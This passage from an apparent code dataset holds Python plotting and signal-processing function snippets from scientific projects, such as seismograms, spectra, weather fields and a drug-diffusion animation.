plt.savefig(f'{plot_dir}/parameters/{parameter}/{project}/plots/fourier_spec/{run}/{data_type}/{station}.{code}.png',bbox_inches='tight',dpi=300)\n else:\n plt.savefig(f'/Users/tnye/tsuquakes/plots/fourier_spec/obs/{data_type}/{station}.{code}.png',bbox_inches='tight',dpi=300) \n \n plt.close()\n\n\n return()", "def view(filename):\n n, data, data_dB,sr,ch=inputwav(filename)\n t=np.linspace(0,n/sr,n)\n py.close()\n fig, (ax1) = py.subplots(nrows=1) \n ax1.plot(t[0:n:100],data[0:n:100],'k-',linewidth=1,label=filename)\n ax1.legend(loc=1)\n ax1.set_ylabel('Amplitude (Rel. 
Bit)')\n ax1.set_xlabel('Time (s)')", "def visualize(data_stream, runs, coke_windows, title,\n each=10, alpha=0.3, run_color=\"forestgreen\",\n coke_color=\"royalblue\", figsize=(12,4)):\n\n plt.figure(figsize=figsize)\n\n # Plot data stream\n data_stream.iloc[::each].plot(linewidth=1, ax=plt.gca())\n\n ax = plt.gca()\n\n # Add overlays for runs\n for wi, window in runs.iterrows():\n ax.axvspan(window[\"run_start\"], window[\"run_end\"], alpha=alpha, color=run_color)\n\n # Add overlays for coke windows\n for wi, window in coke_windows.iterrows():\n ax.axvspan(window[\"start\"], window[\"end\"], alpha=alpha, color=coke_color)\n\n plt.title(title, fontsize=12)\n plt.tight_layout()\n plt.show()", "def stack_plot(self, nrow=6, show=True):\n import matplotlib.pyplot as plt\n import matplotlib.gridspec as gridspec\n import matplotlib as mpl\n mpl.rcParams['font.family'] = 'stixgeneral'\n mpl.rcParams['font.size'] = 15.\n # Check for spec\n gdiline = []\n for iline in self._abslines:\n if isinstance(iline.analy['spec'],Spectrum1D):\n gdiline.append(iline)\n nplt = len(gdiline)\n if nplt == 0:\n print(\"Load spectra into the absline.analy['spec']\")\n return\n # Setup plot\n nrow = min(nplt,nrow)\n ncol = nplt // nrow + (nplt % nrow > 0)\n plt.clf()\n gs = gridspec.GridSpec(nrow, ncol)\n ymnx = (-0.1,1.1)\n\n for qq,iline in enumerate(gdiline):\n ax = plt.subplot(gs[qq%nrow, qq//nrow])\n # Plot\n velo = iline.analy['spec'].relative_vel((1+iline.attrib['z'])*iline.wrest)\n ax.plot(velo, iline.analy['spec'].flux, 'k-', linestyle='steps-mid')\n ax.plot(velo, iline.analy['spec'].sig, 'r:')\n # Lines\n ax.plot([0]*2, ymnx, 'g--')\n # Axes\n ax.set_xlim(self.vlim.value)\n ax.set_ylim(ymnx)\n ax.minorticks_on()\n if ((qq+1) % nrow == 0) or ((qq+1) == nplt):\n ax.set_xlabel('Relative Velocity (km/s)')\n else:\n ax.get_xaxis().set_ticks([])\n # Label\n ax.text(0.1, 0.1, iline.data['name'], transform=ax.transAxes, ha='left', va='center', fontsize='x-large')#, bbox={'facecolor':'white'})\n\n plt.tight_layout(pad=0.2,h_pad=0.,w_pad=0.1)\n if show:\n plt.show()\n plt.close()", "def visualization(tv_summary, speech_summary, start, stop, mode='interactive'):\n\n # There was a problem with unicode to ascii errors cropping up again in matplotlib\n # TODO fix encoding errors for the following years\n skip_years = [1941, 1942, 1945, 1995, 2005, 2006, 2010, 2011]\n for start_year in [year for year in range(start, stop) if year not in skip_years]:\n print \"Creating figure for \" + str(start_year)\n heat_map, keywords = create_heat_map(source=tv_summary,\n response=speech_summary,\n max_keywords=45,\n start_year=start_year,\n interval=50)\n\n fig = plot_heat_map(heat_map, keywords, start_year)\n\n if mode == 'save':\n # Save fig to file\n fig.set_size_inches(11, 7.5)\n fig.savefig('output/output' + str(start_year) + '.png', dpi=100)\n else:\n plt.draw()\n if mode != 'save':\n plt.show()", "def plotspecSNIa( specfile, age=0, z=1, smooth=0, showerr=False, scale=0, color='k' ):\n import numpy as np\n from scipy import interpolate as scint\n medsmooth = lambda f,N : np.array( [ np.median( f[max(0,i-N):min(len(f),max(0,i-N)+2*N)]) for i in range(len(f)) ] )\n\n try : \n wave, flux, fluxerr = np.loadtxt( specfile, unpack=True, usecols=[0,1,2] )\n # fluxerr = fluxerr / 5.\n except : \n wave, flux = np.loadtxt( specfile, unpack=True, usecols=[0,1] )\n fluxerr = np.ones( len(flux) )\n showerr=False\n \n snwave, snflux = getSNIa( age, z )\n\n snfinterp = scint.interp1d( snwave, snflux, bounds_error=False, fill_value=0 ) \n snf 
= snfinterp( wave )\n\n if smooth>0 :\n if smooth<5 : \n smooth=5\n order=3\n print(\"raising S-G smooth window to 5, order 3.\")\n if smooth<7 : \n order=3\n else : \n order=5\n flux = savitzky_golay( flux, smooth, order=order )\n elif smooth<0:\n flux = medsmooth( flux, abs(smooth) )\n\n\n if scale :\n if showerr :\n pl.errorbar( wave, flux, fluxerr, marker=' ', color=color, ls='-', drawstyle='steps-mid', capsize=0, lw=0.5, scalex=False )\n else :\n pl.plot( wave, flux, marker=' ', color=color, ls='-', drawstyle='steps', lw=0.5, ) # , scalex=False )\n pl.plot( snwave, snflux * scale , marker=' ', color='r', ls='-', lw=1.5, scalex=False )\n\n else :\n num = np.sum( snf*flux / fluxerr**2 )\n denom = np.sum( snf**2./ fluxerr**2 )\n scale = num / denom\n\n if showerr :\n pl.errorbar( wave, flux/np.median(flux), fluxerr/np.median(flux), marker=' ', color=color, ls='-', drawstyle='steps-mid', capsize=0, lw=0.5, scalex=False )\n else :\n pl.plot( wave, flux/np.median(flux), marker=' ', color=color, ls='-', drawstyle='steps', lw=0.5, ) # , scalex=False )\n pl.plot( snwave, snflux * scale / np.median(flux) , marker=' ', color='r', ls='-', lw=1.5, scalex=False )\n\n ax1 = pl.gca()\n ax2 = ax1.twiny()\n ax2.set_xlim( ax1.get_xlim()[0] / (1+z), ax1.get_xlim()[1] / (1+z) )\n ax1.set_xlabel('Observed Wavelength (\\AA)')\n ax2.set_xlabel('Rest Wavelength (\\AA)')\n\n return(ax1,ax2)", "def plot1d_if(self,obj,**kwargs):\n var=kwargs.get('var',None)\n varstr = kwargs.get('varstr', None)\n box = kwargs.get('box', None)\n psi = kwargs.get('psi', None)\n xlim = kwargs.get('xlim', None)\n initial = kwargs.get('initial',True)\n \n if(type(psi).__module__ != np.__name__): #None or not numpy data\n psi=obj.psi #default psi is obj.psi\n \n if(type(var).__module__ != np.__name__):\n if(varstr==None): \n print(\"Either var or varstr should be defined.\")\n else:\n var=getattr(obj,varstr) #default var is from varstr\n \n stc=var.shape[0]\n fig, ax=plt.subplots()\n lbl=[\"Initial\",\"Final\"]\n if(xlim==None):\n if(initial):\n ax.plot(psi,var[0,],label='Initial')\n ax.plot(psi,var[stc-1,],label='Final')\n else:\n msk=(psi >= xlim[0]) & (psi <= xlim[1])\n if(initial):\n ax.plot(psi[msk],var[0,msk],label='Initial')\n ax.plot(psi[msk],var[stc-1,msk],label='Final')\n \n ax.legend()\n ax.set(xlabel='Normalized Pol. 
Flux')\n if(varstr!=None):\n ax.set(ylabel=varstr)\n \n #add time stamp of final?\n return fig, ax", "def plot(self):\n pass", "def get_plot(sample):\n scale = (CANVAS_DIM/PATCH_DIM)\n ego_pose = sample[0]\n map_mask = sample[2]\n\n fig, ax = plt.subplots()\n ax.set_ylim([0, CANVAS_DIM]) # set the bounds to be 10, 10\n ax.set_xlim([0, CANVAS_DIM])\n ax.imshow(map_mask[0])\n\n for vehicle in sample[1]:\n plot_vehicle(ax, vehicle, ego_pose, scale)\n\n plt.show()", "def surface_plot(name: str = 'start_date_analysis1.pkl'):\n df = pd.read_pickle(name)\n\n # set up a figure twice as wide as it is tall\n fig = plt.figure(figsize=plt.figaspect(0.5))\n # ===============\n # First subplot\n # ===============\n # set up the axes for the first plot\n ax = fig.add_subplot(1, 2, 1, projection='3d')\n ax.set_title('Modifications per File')\n ax.set_xlabel('Date (Months)')\n ax.set_ylabel('Threshold Individual')\n for idx, row in enumerate(sorted(df['threshold_pairs'].unique())):\n data = df[df['threshold_pairs'] == row]\n label = 'Threshold pairs ' + str(row)\n # Plot the surface.\n surf = ax.plot_trisurf(data['date'], data['threshold'], data['mpf'], alpha=0.7,\n linewidth=0, antialiased=False, label=label)\n surf._facecolors2d = surf._facecolors3d\n surf._edgecolors2d = surf._edgecolors3d\n # ===============\n # Second subplot\n # ===============\n # set up the axes for the second plot\n ax = fig.add_subplot(1, 2, 2, projection='3d')\n ax.set_title('Transitions per Test')\n ax.set_xlabel('Date (Months)')\n ax.set_ylabel('Threshold Individual')\n for idx, row in enumerate(sorted(df['threshold_pairs'].unique())):\n data = df[df['threshold_pairs'] == row]\n label = 'Threshold pairs ' + str(row)\n # Plot the surface.\n\n surf = ax.plot_trisurf(data['date'], data['threshold'], data['tpt'], alpha=0.7,\n linewidth=0, antialiased=False, label=label)\n\n surf._facecolors2d = surf._facecolors3d\n surf._edgecolors2d = surf._edgecolors3d\n\n # cbar = fig.colorbar(surf)\n # cbar.locator = LinearLocator(numticks=10)\n # cbar.update_ticks()\n\n plt.suptitle('Threshold Start Date Analysis 3D', fontsize=14)\n plt.legend()\n plt.show()", "def plot_stream(x,y,gvx,gvy,oargs,outfile):\r\n\t\r\n\tme = \"LE_Plot.plot_stream: \"\r\n\t\r\n\t## Expand out parameters\r\n\tb,X,xmax,ymax,BW,smooth = oargs\r\n\tgv = np.sqrt(gvx*gvx+gvy*gvy)\r\n\t\t\r\n\tshowplot = False\r\n\r\n\t## Smooth data\r\n\tif smooth is not 0.0:\r\n\t\tgvy = gaussian_filter(gvy, smooth)\r\n\t\tgvx = gaussian_filter(gvx, smooth)\r\n\t\tgv = gaussian_filter(gv, smooth)\r\n\toutfile += \"_sm\"+str(smooth)\r\n\t\t\r\n\t## --------------------------------------------------------------------\t\r\n\t\r\n\t## Plotting\r\n\t\r\n\tt0 = time.time()\r\n\tfs = 25\r\n\t\r\n\tfig = plt.figure(facecolor=\"white\")\r\n\tfig.suptitle(outfile)\r\n\t\r\n\t## Add subplot with exact solution\r\n\tif not BW:\r\n\t\tfrom LE_ExactHO import main as plot_exact\r\n\t\tax1 = fig.add_subplot(121,aspect=\"auto\")\r\n\t\tax2 = fig.add_subplot(122,aspect=\"auto\",sharey=ax1)\r\n\t\tplot_exact((ax2,xmax,ymax,b,False))\r\n\t\tfig.tight_layout();fig.subplots_adjust(top=0.93)\r\n\t\tprint me+\"Plotting exact\",round(time.time()-t0,1),\"seconds\"\r\n\telse:\r\n\t\tax1 = fig.add_subplot(111)\r\n\t\r\n\t## Accoutrements\t\r\n\tax1.set_xlim([-xmax,xmax]);\tax1.set_ylim([-ymax,ymax])\r\n\tax1.set_xlabel(\"$x$\",fontsize=fs);ax1.set_ylabel(\"$\\eta$\",fontsize=fs)\r\n\t## Plot wall positions if BW; plot separatrix if HO\r\n\tif BW:\tplot_walls(ax1, X, xmax,ymax,2)\r\n\telse:\tplot_separatrix(ax1, b, 
xmax, ymax, 2)\r\n\t\r\n\t## Line widths\r\n\tlw1 = 3.0*gv/gv.max()\r\n\t\r\n\tt0=time.time()\r\n\t## Plot absolute speed contour and streamplot\r\n\t## NOTE fudge (-) to force agreement with exact\r\n\t# ax1.contourf(xi,yi,gv, 4, alpha=0.4)\r\n\tax1.streamplot(-x,y, -gvx,gvy, arrowsize=1.8, arrowstyle=\"->\", linewidth=lw1, minlength=xmax/20)\r\n\t\t\t\r\n\tprint me+\"Plotting data \",round(time.time()-t0,1),\"seconds\"; t0=time.time()\r\n\t\t\r\n\t## Output\r\n\tfig.savefig(outfile+\".png\",facecolor=fig.get_facecolor(), edgecolor=\"none\")\r\n\tprint me+\"Plot saved\",outfile+\".png\"\r\n\tif showplot:\tplt.show()\r\n\r\n\tplt.close()\r\n\t\t\t\r\n\treturn", "def __init__(self):\n super(vanderpol_output,self).__init__()\n\n # add figure object for further use\n fig = plt.figure()\n self.ax = fig.add_subplot(111)\n self.ax.set_xlim([-2.5,2.5])\n self.ax.set_ylim([-10.5,10.5])\n plt.ion()\n self.sframe = None", "def simple_pick_plot(cat, n_events, template_dict, st_dict, pyasdf=None, savefiles=False):\n from obspy import Catalog, UTCDateTime, Stream\n from obspy.core.event import ResourceIdentifier\n if n_events == 'all':\n rand_cat = cat\n else:\n rand_cat = rand_cat_sample(cat, n_events)\n # Make a list of year + julday integers to loop over\n min_date = min([ev.preferred_origin().time for ev in rand_cat])\n max_date = max([ev.preferred_origin().time for ev in rand_cat])\n for date in daterange(min_date, max_date):\n day_cat = rand_cat.filter(\"time >= \" + str(UTCDateTime(date)),\n \"time <= \" + str(UTCDateTime(date) + 86400))\n if len(day_cat) == 0:\n continue\n stachans = {pk.waveform_id.station_code: [] for ev in day_cat for pk in ev.picks}\n for ev in day_cat:\n for pick in ev.picks:\n if pick.waveform_id.channel_code not in stachans[pick.waveform_id.station_code]:\n stachans[pick.waveform_id.station_code].append(pick.waveform_id.channel_code)\n print(stachans)\n # Read the waveforms for this day\n if pyasdf:\n st = Stream()\n with pyasdf.ASDFDataSet(pyasdf) as ds:\n for sta in stachans:\n for station in ds.ifilter(ds.q.station == str(sta),\n ds.q.channel == stachans[sta],\n ds.q.starttime >= UTCDateTime(date),\n ds.q.endtime <= UTCDateTime(date) + 86400):\n st += station.raw_recording\n for ev in day_cat:\n det_st = st_dict[ev.resource_id]\n det_temp = template_dict[ResourceIdentifier('smi:local/' +\n str(ev.resource_id).split('/')[-1].split('_')[0] +\n '_1sec')]\n fig = plot_repicked(det_temp, ev.picks, det_st, size=(21, 15), save=savefiles,\n savefile=str(ev.resource_id).split('/')[-1] + '.png',\n title=str(ev.resource_id).split('/')[-1])", "def plot_fr_and_spikes(self, t):\n plt.figure(figsize=(10, 8))\n\n plt.subplot(2, 2, 1)\n self.plot_base_image()\n\n plt.subplot(2, 2, 2)\n self.plot_firing_rates(t, mode='ON')\n plt.title('Retinal Image')\n\n # Spikes\n ax = plt.subplot(2, 2, 3)\n self.plot_spikes(ax, t, mode='ON', moving_average=True)\n\n ax = plt.subplot(2, 2, 4)\n self.plot_spikes(ax, t, mode='OFF', moving_average=True)", "def visualize_scan(self):\n fig = plt.figure()\n ax = fig.add_subplot(111, projection='3d')\n ax.scatter(self.p1_points[:, 0], self.p1_points[:, 1], self.p1_points[:, 2], c='r')\n ax.scatter(self.p2_points[:, 0], self.p2_points[:, 1], self.p2_points[:, 2], c='g')\n ax.scatter(self.p3_points[:, 0], self.p3_points[:, 1], self.p3_points[:, 2], c='b')\n ax.scatter(self.p4_points[:, 0], self.p4_points[:, 1], self.p4_points[:, 2])\n\n ax.set_xlabel('x')\n ax.set_ylabel('y')\n ax.set_zlabel('z')\n plt.show()", "def plot(self):\n\t\tself.plotOfLoopVoltage()", 
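"def plot_timeseries(t, y, ylabel='Amplitude', outfile=None):\n # Editor-added illustrative sketch, not drawn from any source package:\n # a minimal matplotlib save-or-show helper in the style of the plotting\n # snippets above. All names here (plot_timeseries, outfile) are hypothetical.\n import matplotlib.pyplot as plt\n fig, ax = plt.subplots(figsize=(8, 4))\n ax.plot(t, y, 'k-', lw=1)\n ax.set_xlabel('Time (s)')\n ax.set_ylabel(ylabel)\n ax.grid(True)\n fig.tight_layout()\n if outfile is not None:\n # save to disk when a target path is given\n fig.savefig(outfile, bbox_inches='tight', dpi=300)\n else:\n # otherwise display interactively\n plt.show()\n plt.close(fig)",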
"def plot_priorsamps(meta):\n priorsamps = np.array(meta.priordist.sample_ps(len(meta.colors))[0])\n f = plt.figure(figsize=(5,10))\n sps_log = f.add_subplot(2,1,1)\n sps_lin = f.add_subplot(2,1,2)\n sps_log.set_title(meta.name)\n f.subplots_adjust(hspace=0, wspace=0)\n sps_log.set_ylabel(r'$\\ln[p(z|\\vec{\\theta})]$')\n sps_lin.set_xlabel(r'$z$')\n sps_lin.set_ylabel(r'$p(\\vec{\\theta})$')\n sps_log.set_xlim(meta.binends[0]-meta.bindif,meta.binends[-1]+meta.bindif)#,s_run.seed)#max(n_run.full_logfltNz)+m.log(s_run.seed/meta.zdif)))\n sps_lin.set_xlim(meta.binends[0]-meta.bindif,meta.binends[-1]+meta.bindif)#,s_run.seed)#max(n_run.full_logfltNz)+m.log(s_run.seed/meta.zdif)))\n plotstep(sps_log,meta.binends,meta.logintPz,l=r'Log Interim Prior $\\ln[p(z|\\vec{\\theta}^{0})$]')\n plotstep(sps_lin,meta.binends,meta.intPz,l=r'Interim Prior $p(z|\\vec{\\theta}^{0})$')\n for c in lrange(meta.colors):\n plotstep(sps_log,meta.binends,priorsamps[c]-np.log(meta.ngals),c=meta.colors[c])\n plotstep(sps_lin,meta.binends,np.exp(priorsamps[c]-np.log(meta.ngals)),c=meta.colors[c])\n sps_log.legend(loc='upper right',fontsize='x-small')\n sps_lin.legend(loc='upper right',fontsize='x-small')\n f.savefig(os.path.join(meta.topdir, 'priorsamps.pdf'),bbox_inches='tight', pad_inches = 0)\n return", "def plot_xy(nc,params,tms,lev=None):\n \n import matplotlib.pyplot as plt\n import ggWRFutils as gW\n from datetime import datetime\n import numpy as np\n wvar={}\n for p in params:\n if p != 'Times':\n if p=='WS10':\n wvar[p]=np.sqrt(nc.variables['U10'][:]**2+nc.variables['U10'][:]**2)\n elif p=='UV10': \n wvar['U10']=nc.variables['U10'][:,:,:] \n wvar['V10']=nc.variables['V10'][:,:,:] \n elif p=='UV':\n wvar['U']=nc.variables['U'][:,lev,:,:] \n wvar['V']=nc.variables['V'][:,lev,:,:] \n elif len(nc.variables[p].shape) > 3:\n wvar[p]=nc.variables[p][:,lev,:,:] \n else: \n wvar[p]=nc.variables[p][:] \n Nx,Ny,Nz,lon,lat,dx,dy=gW.getDimensions(nc)\n for p in params:\n if params[p]=='pcolor':\n plt.pcolor(lon,lat,wvar[p][tms,:,:],shading='flat')\n plt.colorbar()\n if params[p]=='contourf':\n plt.contourf(lon,lat,wvar[p][tms,:,:],50)\n plt.colorbar()\n if params[p]=='contour':\n plt.contourf(lon,lat,wvar[p][tms,:,:])\n plt.colorbar()\n if params[p]=='quiver':\n if p=='UV10':\n plt.quiver(lon[::10,::10],lat[::10,::10],wvar['U10'][tms,::10,::10],wvar['V10'][tms,::10,::10],units='width')\n elif p=='UV':\n plt.quiver(lon,lat,wvar['U'][tms,:,:],wvar['V'][tms,:,:])\n plt.hold(True)\n plt.xlim(lon.min(),lon.max())\n plt.ylim(lat.min(),lat.max())\n fig=plt.gcf()\n return fig", "def plotSeismogram(d, rho, v, wavf, wavA=1., noise = 0., usingT=True, wavtyp='RICKER'):\n\n tseis, seis, twav, wav, tref, rseriesconv = syntheticSeismogram(d, rho, v, wavf, wavA, usingT,wavtyp)\n\n noise = noise*np.max(np.abs(seis))*np.random.randn(seis.size)\n filt = np.arange(1.,15.)\n filtr = filt[::-1]\n filt = np.append(filt,filtr[1:])*1./15.\n noise = np.convolve(noise,filt)\n noise = noise[0:seis.size]\n\n seis = seis + noise\n\n plt.figure(num=0, figsize = (8, 5))\n\n plt.subplot(131)\n plt.plot(wav,twav,linewidth=1,color='black')\n plt.title('Wavelet')\n plt.xlim((-2.,2.))\n plt.grid()\n plt.ylim((tseis.min()-tseis.mean(),tseis.max()-tseis.mean()))\n plt.gca().invert_yaxis()\n plt.setp(plt.xticks()[1],rotation='90',fontsize=9)\n plt.setp(plt.yticks()[1],fontsize=9)\n plt.gca().set_xlabel('Amplitude',fontsize=9)\n plt.gca().set_ylabel('Time (s)',fontsize=9)\n\n plt.subplot(132)\n 
plt.plot(np.zeros(tref.size),(tseis.max(),tseis.min()),linewidth=2,color='black')\n plt.hlines(tref,np.zeros(len(rseriesconv)),rseriesconv,linewidth=2) #,'marker','none'\n plt.title('Reflectivity')\n plt.grid()\n plt.ylim((0,tseis.max()))\n plt.gca().invert_yaxis()\n plt.xlim((-2.,2.))\n plt.setp(plt.xticks()[1],rotation='90',fontsize=9)\n plt.setp(plt.yticks()[1],fontsize=9)\n plt.gca().set_xlabel('Amplitude',fontsize=9)\n plt.gca().set_ylabel('Time (s)',fontsize=9)\n\n plt.subplot(133)\n plt.plot(seis,tseis,color='black',linewidth=1)\n plt.title('Seismogram')\n plt.grid()\n plt.ylim((tseis.min(),tseis.max()))\n plt.gca().invert_yaxis()\n plt.xlim((-0.95,0.95))\n plt.setp(plt.xticks()[1],rotation='90',fontsize=9)\n plt.setp(plt.yticks()[1],fontsize=9)\n plt.gca().set_xlabel('Amplitude',fontsize=9)\n plt.gca().set_ylabel('Time (s)',fontsize=9)\n\n plt.tight_layout()\n plt.show()", "def plot_visual_abstract():\n # Which generations to plot\n GENERATIONS = [100, 230, 350]\n\n # LunarLander CMA-ES\n experiment_path = glob(\"experiments/wann_LunarLander-v2_CMAES*\")\n assert len(experiment_path) == 1, \"There should be only one CMA-ES experiment with LunarLander-v2\"\n experiment_path = experiment_path[0]\n\n pivector_paths = glob(os.path.join(experiment_path, \"pivectors\", \"*\"))\n\n tsnes = []\n rewards = []\n for generation in GENERATIONS:\n # Find pivector files for specific generation, load them and store points\n generation_paths = [path for path in pivector_paths if \"gen_{}_\".format(generation) in path]\n\n population = [np.load(path) for path in generation_paths]\n population_tsnes = np.array([x[\"tsne\"] for x in population])\n population_rewards = np.array([x[\"average_episodic_reward\"] for x in population])\n tsnes.append(population_tsnes)\n rewards.append(population_rewards)\n\n figure, axs = pyplot.subplots(\n figsize=[2.5 * 3, 2.5],\n nrows=1,\n ncols=len(GENERATIONS),\n sharex=\"all\",\n sharey=\"all\"\n )\n\n min_reward = min(x.min() for x in rewards)\n max_reward = max(x.max() for x in rewards)\n scatter = None\n\n for idx in range(len(GENERATIONS)):\n population_tsne = tsnes[idx]\n population_rewards = rewards[idx]\n generation = GENERATIONS[idx]\n ax = axs[idx]\n\n scatter = ax.scatter(\n population_tsne[:, 0],\n population_tsne[:, 1],\n c=population_rewards,\n vmin=min_reward,\n vmax=max_reward,\n cmap=\"plasma\"\n )\n ax.set_title(\"Generation {}\".format(generation))\n ax.set_xticks([])\n ax.set_yticks([])\n ax.axis(\"off\")\n\n # Making room for colorbar\n # Stackoverflow #13784201\n figure.subplots_adjust(right=1.0)\n cbar = figure.colorbar(scatter)\n cbar.set_ticks([])\n cbar.ax.set_ylabel(\"Reward $\\\\rightarrow$\", rotation=90, fontsize=\"large\")\n\n figure.tight_layout()\n figure.savefig(\"figures/visual_abstract.pdf\", bbox_inches=\"tight\", pad_inches=0.05)", "def plot_fitter(self):\n\n total_time=self.interval*self.maxspectra\n times = np.linspace(self.interval,total_time + 1,self.interval)\n spectra_fitter.main(self.rt_plot.sum_data, times)", "def dynamic_figure(r=None,z=None,t=None):\n global yt, t0, nt, zcut, theta, cnt, main_title\n\n # guard clauses must actually raise; a bare RunTimeError(...) call is a NameError\n if r is None:\n raise RuntimeError(\"r is None\")\n if z is None:\n raise RuntimeError(\"z is None\")\n if t is None:\n raise RuntimeError(\"t is None\")\n \n theta = linspace( 0.0, 2.0*scipy.pi, num=100)\n \n R, Z = meshgrid(r,z)\n \n fu = FuModel(nt=100)\n \n ycube = fu.FuCon(R, Z, t) # ycube[:,:,:] DATA CUBE!!!\n\n #-----------------------------FIGURES------------------------------\n fig = figure(figsize=(6,8.5))\n \n t0 = 0\n yt = 
ycube[:,:,t0]\n \n titulo = 'Fu drug diffusion model: t = %07.2f' % t[t0]\n main_title=fig.text(0.25, 0.95, titulo,\n horizontalalignment='left',\n fontproperties=FontProperties(size=16))\n \n cmap = cm.cool\n subplots_adjust(hspace=0.0)\n \n subplot(211)\n ax = gca()\n im1 = imshow(yt,\n interpolation='bilinear',\n cmap=cmap,\n origin='lower',\n extent=(0,1.0,z[0],z[-1]),\n aspect = 0.23\n )\n \n xlabel(r'R = r/a', fontsize=14)\n ylabel(r'Z = z/l', fontsize=14)\n\n subplot(212,aspect='equal')\n ax = gca()\n\n #\n #--- cylindrical cross-section\n \n RAD, THETA = meshgrid(r,theta)\n Xpos = RAD*cos(THETA)\n Ypos = RAD*sin(THETA)\n \n #\n # top cap of cylinder\n #\n #zcut = len(z)-1\n zcut = 0\n if z[0] != 0.0:\n zcut = int(len(z)/2+0.5)\n title('Z = %f'%z[zcut],fontsize=16)\n #\n # Take a cross-section of the cylinder at some point Z ==> radius array of length len(r) \n # -----\n # Trick\n # -----\n # Now create a matrix[len(theta),len(r)] by replicating the above array len(theta) times\n # along dimension 0\n #\n \n zx = outer( ones(len(theta)), yt[zcut,:] )\n \n im2 = pcolormesh(Xpos, Ypos,\n zx,\n shading='flat',\n cmap=cmap)\n \n xlabel(r'X/a', fontsize=14)\n ylabel(r'Y/a', fontsize=14)\n \n #\n #--- new axis for colorbar\n #\n norm = colors.Normalize(vmin=0.0, vmax=1.0)\n im1.set_norm(norm)\n im2.set_norm(norm)\n im1.add_observer(im2)\n \n pos = ax.get_position()\n l, b, w, h = getattr(pos, 'bounds', pos)\n cax = axes([l+w+0.015, b, 0.025, h]) # setup colorbar axes\n colorbar(im1, cax, orientation='vertical') \n \n manager = get_current_fig_manager()\n \n cnt = 0\n files = []\n nt = len(t)\n #\n #------------------------------------------------------------------\n def updatefig(*args):\n global yt, t0, nt, zcut, theta, cnt, main_title\n \n t0 += 1\n if t0 > nt-1:\n return False\n \n yt = ycube[:,:,t0]\n zx = outer( ones(len(theta)), yt[zcut,:] )\n Nx, Ny = yt.shape\n im1.set_array(yt)\n im2.set_array(ravel(zx[0:Nx-1,0:Ny-1]))\n titulo = 'Fu drug diffusion model: t = %07.2f' % t[t0]\n main_title.set_text(titulo)\n manager.canvas.draw()\n \n #fname = '_tmp%03d.jpg' % t0\n fname = '_tmp%03d.png' % t0\n savefig(fname)\n files.append(fname)\n \n cnt += 1\n return True\n #\n #------------------------------------------------------------------\n\n cnt = 0\n gobject.idle_add(updatefig)\n\n ioff()\n show()\n\n command = \"ffmpeg -r 10 -sameq -i _tmp%03d.png test.mp4\"\n #command = \"mencoder -ovc xvid -xvidencopts \" + \\\n # \"pass=2:bitrate=15999:max_bframes=0 \" + \\\n # \"-oac copy -mf fps=10:type=jpeg 'mf://_tmp*.jpg' -vf harddup -ofps 10 \" + \\\n # \"-noskip -of avi -o outputfile.avi\"\n os.system(command)\n for fname in files: os.remove(fname) #clean up\n\n return True", "def _plot_camera_view(self):\n fig, axs = plt.subplots()\n fig.show()\n axs.cla()\n axs.axis([-0.003, 0.003, -0.003, 0.003])\n axs.grid()\n axs.plot([0], [0], 'r+')\n for t_step in range(0, int(self._t_sim / self._dt) + 1, 250):\n axs.plot(\n self._feat_vec[t_step, 0, 0],\n self._feat_vec[t_step, 1, 0], 'ro')\n axs.plot(\n self._feat_vec[t_step, 0, 1],\n self._feat_vec[t_step, 1, 1], 'bo')\n axs.plot(\n self._feat_vec[t_step, 0, 2],\n self._feat_vec[t_step, 1, 2], 'yo')\n axs.plot(\n self._feat_vec[t_step, 0, 3],\n self._feat_vec[t_step, 1, 3], 'go')\n axs.plot(\n self._feat_vec[t_step, 0, 4],\n self._feat_vec[t_step, 1, 4], 'ro')\n plt.pause(1 / self._plot_fps)", "def example3():\n arrive_time=example2() # Get packets arrive time using example1\n time_series.plot_time_series(arrive_time) # Plot time series using packets 
arrive time", "def ts_method(signal, peaks, template_duration: float = 0.12, fs: int = processing.FS, window: int = 10, **kwargs):\n\n t_dur = round(template_duration * fs)\n if not t_dur % 2 == 0:\n t_dur += 1\n dims = signal.shape\n # if np.max(np.abs(signal[0, :])) < np.max(np.abs(signal[1, :])):\n # r_peaks = find_qrs(signal[1, :], peak_search=peak_search)\n # r_peaks = peak_enhance(signal[1, :], peaks=r_peaks, window=0.2)\n # else:\n # processing.scatter_beautiful(r_peaks * 1000 / fs, title='peaks')\n extracted_signal = np.copy(signal)\n # print(len(r_peaks))\n # Please, rework it...\n for n in range(dims[0]):\n for i in range(0, len(peaks), window):\n\n if i + window > len(peaks):\n r_peaks = peaks[i:]\n else:\n r_peaks = peaks[i:i + window]\n\n template = np.full((len(r_peaks), t_dur), np.nan)\n for num, r_ind in enumerate(r_peaks):\n if r_ind < t_dur // 2:\n template[num, t_dur // 2 - r_ind - 1:] = extracted_signal[n, 0:r_ind + t_dur // 2 + 1]\n elif r_ind + t_dur // 2 + 1 > dims[1]:\n template[num, 0:dims[1] - r_ind + t_dur // 2] = extracted_signal[n, r_ind - t_dur // 2:]\n else:\n template[num] = extracted_signal[n, r_ind - t_dur // 2:r_ind + t_dur // 2]\n template_mean = np.nanmean(template, axis=0) # None for edge cases\n for r_ind in r_peaks:\n if r_ind < t_dur // 2:\n extracted_signal[n, 0:r_ind + t_dur // 2 + 1] -= template_mean[t_dur // 2 - r_ind - 1:]\n # processing.scatter_beautiful(components[n, :], title=' subtracted channel start ' + str(n))\n elif r_ind + t_dur // 2 + 1 > dims[1]:\n extracted_signal[n, r_ind - t_dur // 2:r_ind + t_dur // 2 + 1] -= template_mean[\n 0:dims[1] - r_ind + t_dur // 2]\n # processing.scatter_beautiful(components[n, :], title=' subtracted channel end ' + str(n))\n else:\n extracted_signal[n, r_ind - t_dur // 2:r_ind + t_dur // 2] -= template_mean\n # processing.scatter_beautiful(components[n, :], title=' subtracted channel ' + str(n))\n return extracted_signal", "def plot(self):\n\t\tself.plotOfTF().plot()", "def plot_section(t, syn, obs):\n\n fig, ax = plt.subplots(1, 2, sharex=True, sharey=True, figsize=(8, 8))\n\n for ir in range(syn.shape[0]):\n\n # Synthetic\n ax[0].plot(t, ir + syn[ir, :], 'k')\n ax[0].set_xlabel('Time in s')\n ax[0].set_ylabel('Amplitude')\n ax[0].set_title('Synthetic')\n\n # Noisy observed data\n ax[1].plot(t, ir + obs[ir, :], 'k')\n ax[1].set_xlabel('Time in s')\n ax[1].set_title('Observed')\n ax[1].set_xlim([np.min(t), np.max(t)])\n ax[1].set_ylim([-1, syn.shape[0]+1.5])\n\n plt.tight_layout()\n\n plt.show(block=False)", "def show_plot(self):\n runs = self.GetParent().runs\n if len(runs) <= 0: return\n\n t1 = 